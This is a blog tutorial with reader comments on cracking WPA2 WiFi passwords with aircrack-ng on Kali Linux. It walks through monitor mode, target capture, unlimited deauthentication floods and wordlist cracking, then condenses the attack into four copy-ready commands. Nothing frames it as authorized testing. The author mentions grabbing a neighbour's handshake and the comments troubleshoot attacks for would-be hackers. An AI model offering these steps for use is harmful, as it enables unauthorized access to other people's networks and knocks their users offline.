Cracking WPA2 WiFi password using aircrack-ng Kali Linux

Cracking WPA2 wifi password is not really an easy thing to do,
no you can't crack it with a click and there is no software that will give you the password without some hard work ...
don't run away still you can crack it  with few steps here :) and we will do it using aircrack-ng

For a fast wifi cracking check this video

Requirements: To crack a wpa2-psk encrypted wifi password using aircrack-ng

1- Kali Linux or any Linux system with aircrack-ng installed
  a- if you don't have aircrack-ng suite get it by this commend in terminal
sudo apt-get install aircrack-ng
2- a wireless network adapter that support monitor mode like
  a- Alfa 2W AWUS036NH
  b- Alfa AWUS036H
  c- wifiy-city 56G
  d- and you can check this page here for card compatibility compatibility drivers
3- a word list comprising of all the possible different combination of pass-phrases

Now let's get to work
i will be using wifiy-city 56G card on Kali linux 2 sana

1) open up your terminal as root and type
this will show you all the networking interfaces connected to your device.

if your wireless network adapter is working fine you should see the " wlan0 " the name may change if you have more then one connected wireless adapter.

2) now to start monitor mode type
airmon-ng start wlan0 
'airmon-ng' is a traffic monitoring tool
‘wlan0’ is your wireless interface
after this commend we started the monitor mode
as it's seen the monitor mode is working under wlan0mon , so this is your card name for now
in the red area a list of process id’s that cause trouble during the process so kill those processes by typing
kill <pid>
 in my case
kill 743 898 1070 1071 1081 
 now type ifconfig and this will show the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0 .

3) to show list of available WiFi network type
airodump-ng wlan0mon

airodump-ng is a wifi packets capturing tool
wlan0mon is my  monitoring interface
airodump-ng  will start capturing all packets and from the captured packets
select your target and note its ‘bssid’ (bssid = base service set identifier) and channel
then stop the capture using “cntrl+c“.

4) Start capturing the packets of your target network
type the following command
airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon 
i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 

 this will start the capturing of packets.
and if you get the handshake you wont need the aireplay command...
if you don't get the handshake yet
while the capturing of packets goes on, open a new terminal as root and type
aireplay-ng -0 0 -a <bssid> mon0
aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
-0 = number associated for deauthentication,
0 = deauth count,
-a = bssid) here we are trying to send a deauthentication request.
In my case the command looks like
aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon

after few seconds stop it using cntrl+c.
now after we have successful captured the wpa handshake

5) Stop the capturing using cntrl+c and type “ls” that would bring up all the current directories and files.
Select the file with “.cap“extension and type the following command
aircrack-ng -w <full location of the word list> <name of the file>
aircrack-ng is a tool that helps in cracking the password
In my case the command looks like
aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
For the Wordlist Check this Post Best Password dictionary
Now it starts finding suitable passphrase.

and now all you have to do is wait till you see the lovely news ( KEY Found  ( your key is here ;) ).

all Step in few lines
1) airodump-ng wlan0mon
2) airodump-ng -c 9 -w wifi  --bssid C4:6E:1F:F6:34:B8 wlan0mon
3) aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
4) aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

have a great day :)
you can check the video in youtube and see how its working and cracking 

Best wifi Adapter to work with Aircark
                Here is a list of Wireless cards that support injection and monitor mode
1. Alfa AWUS036NHA –(2.4GHz)
2. TP-LINK TP-WN722N $13.44
3. AWUS036H – (2.4GHz) $26.99
4.TP-Link WN722N (2.4GHz) $18.97
5.D-Link DWA-110

how to Crack WPA2 wifi password using aircrack-ng Kali linux 2

Labels: ,

Post a Comment

  1. What is morethan.txt tell me plss i have rockyou.text.gz is this both same

    1. Check this post i just wrote it , after reading it you will understand everything about rockyou.text.gz and what i meant by morethan8.txt

    2. hey my nme is demi i want to be came the best goverment tool {HACKER} please make me your nick name HAWK)

  2. After entering last command I get error "directory doesn't exist" I check the file and it is under usr/share/wordlists, am I entering wrong command?

    1. aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

      dose your file have the same name as mine ? ( more_than_8.txt ) ?

    2. dude your using an OS bigger than you... start using those easy phone app for hacking, XlOL..

    3. there is nothing bigger then human mind in here !
      if he want to do it he will learn to do it

  3. I have googled extensively regarding my wireless card, and followed literally hundreds of step by steps guides with fw cutter ect. What im getting is i can switch to mon mode, I can see my AP and others, I did aireplay injection test, shows injection is working! BUT! When I try to authenticate on my AP I never actually get any handshake also I can never see clients I manually connect to my AP. I know im close enough because its my own AP literally a meter away from my machine, Its definately in monitor mode and I can inject 'so it says'. Just not sure where im going wrong. My device is the Broadcom b4312 lpphy rev 01. I blacklisted other drivers ect and when i use check it says device b43x so assuming its running the correct driver and FW cutter didnt show any errors so assuming the firmware has been patched. Spent days and days with this one, any tips would be massively appreciated. Many thanks.

    1. DEAUTH - DOESNT WORK, Associated clients on my network dont show when I manually connect another machine to my own AP to see if airodump picks it up. I tried to DEAUTH all clients on AP and nothing. Fake auth doesnt work as I get nothing with open system and sharedkey shows error locating sharedkey file

    2. i'm sorry with this problem i cant help coz i do face the same problem sometime and couldn't really find a way to fix it yet

      some AP give me the handshake and some not
      my friend house is close to mine i can get his AP handshake
      and at the same time i cant get my AP handshake and its closer then his AP
      i just don't really understand the problem behind this

  4. Hi bro .....once you found keys so how to use them .....plz tell me bro....

    1. You put it on your computer like you want to connect to the wifi

  5. Hi bro am happe for what you did. Get an error :
    No data - WEP or WPA

    Choosing first network as target

    Opening ******.cap

    Got no data packets from target network

    Quitting aircrack-ng

    1. Can you help me to solve it thanks again :)

    2. Maybe it's because i use a DVD in live amd64 mode. I didn't installe kali just use it in live mode

    3. you need to get the handshake again so start the task all over

  6. It's been more than 24mins but its not showing handshake what to do now ?? Please help .

    1. This comment has been removed by the author.

    2. Most wifi adapters are made to get signal within your own home. Get a wifi adapter with a RTL8187L chipset such as the Alpha models.. They have good range.

  7. hi bro last order aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
    give me pleas specify a dictionary option -w

    1. change the .cap file name with your .cap file name !
      change more_than_8.txt with your own dictionary file name !

      if you don't know how to get the dictionary check this post

    2. I changed the name and it still tells me to specify a dictionary option. What do I do?

  8. Hi man i am using a Ralink wireless USB adapter am i going to achieve result.

  9. My file is in home and when i type aircrack-ng -w /home/wifi-01.cap
    I get an error saying the file does not exist. What do I type?

    1. try the comment without /home/

      so it should look like this aircrack-ng -w wifi-01.cap

    2. help!! i tried aircrack-ng -w wifi-01.cap
      and no file to crack specified.

    3. help!! I tried aircrack-ng -w wifi-01.cap
      and No file to crack specified.

  10. How about the same tutorial for 2016.1? Because many of us are having issues with packet injection, even with the correct driver/chipset.
    I do not want to install an older version.

    1. will make one soon but what about the AP you are targeting is it N or the old chipset ?

  11. How about the same tutorial for 2016.1? Because many of us are having issues with packet injection, even with the correct driver/chipset.
    I do not want to install an older version.

  12. Hello. I found this blog after attempting many times to crack my own WiFi access point. I'm using an Alfa AWUS036NH USB adapter, running a Kali VM on Ubuntu. After trying these steps and other variations of them, I found a command on another site:

    aireplay-ng -9 wlan0mon

    I read that it's supposed to if packet injection is supported by my adapter. But I'm wondering if it really is to test if any Access Points it finds are able to be packet injected. Does anyone know? The response to this command was something to the affect of:

    No Answer...
    Found 0 APs

    Can anyone clarify? Thanks in advance!

    1. aireplay-ng is a tool for deauthentication
      what it really do is disconnect all user to the AP and then when they reconnect you start capturing the packets

    2. This comment has been removed by the author.

    3. Thanks for your response.

      So that command does not do what I thought it did? Because it did not disconnect all users from the AP either. It looked like it was searching for APs and didn't find any. Basically I can't get this tutorial(or any other variation that I've found online) to work for deauthentication or capturing packets. I've tried my AP and several others that get a decent signal.

      Could it just be the case that alo APs within my range are protected against this type of attack?

    4. the command aireplay-ng should disconnect all users from the AP...
      in your case i'm not sure whats the problem ...
      but whats the wifi adapter you are using ? name it

    5. Walid- As I said in my original question I'm using the Alfa AWUS036NH USB adapter. This adapter was recommended by the initial resource I was looking at for cracking WiFi, so I'm thinking it should have the necessary capabilities. Thanks.

    6. oh im sorry i forget its an Alfa AWUS036NH...
      okay will as you know this adapter should work fine ... now we have to check the AP so whats your AP name and version

    7. No problem. It's an Arris TG1682G. The hardware rev is 9.0

  13. Replies
    1. Great :) what WiFi adapter are you using ?

  14. Hello Walid,

    What adapter should I use?

    1. hi there , there is a list at the end of the post for adapters that works with this tutorial

      1. Alfa AWUS036NHA –(2.4GHz)
      2. TP-LINK TP-WN722N $13.44
      3. AWUS036H – (2.4GHz) $26.99
      4.TP-Link WN722N (2.4GHz) $18.97

      al of them work fine but alfa adapters is the best of the best

  15. I want to learn to hack please make me your student.

    1. you can learn by reading what i have on this website :)

  16. Hey ....
    my leptop does not on monitor mode can i hack wifi password without monitor mode.....??????????????????????/

    1. no you can't
      you need a USB WiFi adapter

  17. dude, to hack, we need near to the AP and couple clients of the AP right? so we can get the handshake? if we only have AP access (because pointing from long distance) we wont be able to hack/crack the password?

  18. This comment has been removed by a blog administrator.

  19. This comment has been removed by a blog administrator.

  20. hey bro! I am happy what you did. Every thing was going fine with these command. But i got problem after last command: #aircrack-ng -w /usr/share/wordlists/wifi.txt ***-01.cap
    fopen (directory) failed: No such file or directory
    fopen (directory) failed: No such file or directory
    opening ***-01.cap
    Read 509127 packets.
    xx:xx:xx:xx:xx:xx xyz WPA(1 handshake)

    choose first network as target.
    opening ***-01.cap
    please specify a dictionary (option -w)

    Quitting aircrack-ng.......

    I don't suppose that my cap file has been broken. Am I wrong??what might be the problem??? and what might be the solution??? please provide me guidance..

    1. hi bro
      i think the problem is here : /usr/share/wordlists/wifi.txt
      is your Password dictionary in that path ?

    2. i think, yes, it is the path of my password dictionary. Because when i wrote command #ls initially it does not shows the rockyou.txt file bt when i wrote #ls command after the execution of first three command of the tutorial i.e cp /usr/share/wordlists/rockyou.txt.gz . , gunzip rock you.txt.gz and cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > wifi.txt it shows the both rockyou.txt and wifi.txt
      i also tried other path i.e Desktop/usr/share/wordlists/wifi.txt
      and Desktop/share/wordlists/wifi.txt
      bt i receive same error.

    3. and yea i also tried interchanging the place of -w /usr/share/wordlists/wifi.txt and ***-01.cap bt problem remains same.

    4. Error message "fopen(dictionary)failed: No such file or directory"
      This means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.

    5. try to change the password dictionary to other name or try just to check it with rockyou.txt
      aircrack-ng -w /usr/share/wordlists/rockyou.txt wifi-01.cap

  21. Hey walid...i hv tried many time but wen i aircrack...its show 'please specify a dictionary (option -w)' even i specified 'wifi-01.cap file. So how? Hepp me plz.

    1. when it ask you to specify a dictionary you need to specify a txt file that have a list of passwords to try it

  22. Heloo walid... i tried so many times as u post here.. but wen aircrack it shows 'please specify a dictionary (option -w)' even i specified the file location. Help me plz

    1. Hi Niethiya
      please check this newst post about wifi cracking
      how to hack wifi password

  23. what to do if we get the handshake after 'airodump-ng -c -w --bssid wlan0mon'?



Author Name

{picture#YOUR_PROFILE_PICTURE_URL} YOUR_PROFILE_DESCRIPTION {facebook#} {twitter#} {google#} {pinterest#} {youtube#}

Contact Form


Email *

Message *

Powered by Blogger.